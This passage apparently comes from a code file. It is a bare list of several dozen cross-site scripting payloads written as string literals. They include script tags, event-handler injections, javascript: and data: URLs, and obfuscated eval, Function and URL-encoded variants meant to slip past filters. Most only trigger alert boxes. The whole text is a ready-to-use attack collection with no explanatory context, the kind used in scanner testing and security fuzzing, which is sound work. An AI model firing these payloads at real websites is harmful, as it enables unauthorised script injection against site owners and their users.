'"><script>document.body.innerHTML="XSS";</script>',
    '<script>location="javascript:alert(1)"</script>',
    '<script>document.location="javascript:alert(1)"</script>',
    '<script>window.name="<img src=x onerror=alert(1)>"</script>',
    '<script>document.write("<img src=x onerror=alert(1)>")</script>',
    '<script>setTimeout("alert(1)",1000)</script>',
    '<script>var a = "alert"; a += "(1)"; eval(a);</script>',
    '<script>window["al"+"ert"](1)</script>',
    '<script>history.pushState({}, "", "?xss"); alert(1);</script>',
    '<script>var hash = location.hash; if(hash) eval(hash.substr(1))</script>#alert(1)',
    '<input id=x onfocus="alert(1)" autofocus>',
    '<button onclick="location=window.name">Click</button>',
    '<img src=x onerror="eval(window.name)">',
    '<a href="#" onclick="alert(document.referrer)">Click</a>',
    '<script>if(top) top.location="javascript:alert(1)"</script>',
    '<script>location="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="</script>',
    '<script>document.cookie="xss=1";alert(1);</script>',
    '<script>if(document.location.hash) alert("XSS")</script>#test',
    '<script>window.location.href="javascript:alert(1)"</script>',
    '<script>eval(unescape("%61%6C%65%72%74%28%31%29"))</script>',
    '<script>window.location.replace("javascript:alert(1)")</script>',
    '<img src=x onerror="this.onerror=null; alert(document.URL)">',
    '<script>var x = new URLSearchParams(location.search); alert(x)</script>',
    '<script>let q = location.search.slice(1); eval(q)</script>?alert(1)',
    '<script>new Function("alert(1)")()</script>',
    '<input oninput="eval(this.value)" value="alert(1)">',
    '<script src="#"></script><script>alert(1)</script>',
    '<script>top.frames[0].document.body.innerHTML="XSS"</script>',
    '<script>parent.postMessage("alert(1)", "*")</script>',
    '<script>var d=document; d.write("<img src=x onerror=alert(1)>")</script>',
    '<script>let d=document; d.write(unescape("%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E"))</script>',
    '<script>window.addEventListener("load",()=>{alert(1)})</script>',
    '<img src=x onerror="setTimeout(()=>alert(1),500)">',
    '<a href="#" onclick="this.innerHTML=\'<img src=x onerror=alert(1)>\'">click</a>',
    '<script>window.addEventListener("message",e=>eval(e.data))</script>',
    '<iframe src="x" onload="alert(document.domain)"></iframe>',
    '<input onfocus="alert(1)" value="click" autofocus>',
    '<script>document.body.setAttribute("onload", "alert(1)")</script>',
    '<script>this["ale"+"rt"](1)</script>',
    '<script>window.open("javascript:alert(1)")</script>',
    '<script>eval("alert(1)")</script>',
    '<script>fetch("javascript:alert(1)")</script>',
    '<script>import("data:text/javascript,alert(1)")</script>',
    '<script>navigator.sendBeacon("javascript:alert(1)")</script>',
    '<script>let f = Function("alert(1)"); f();</script>',
    '<img src onerror="alert(window.location)">',
    '<script>if (document.referrer) alert(document.referrer)</script>'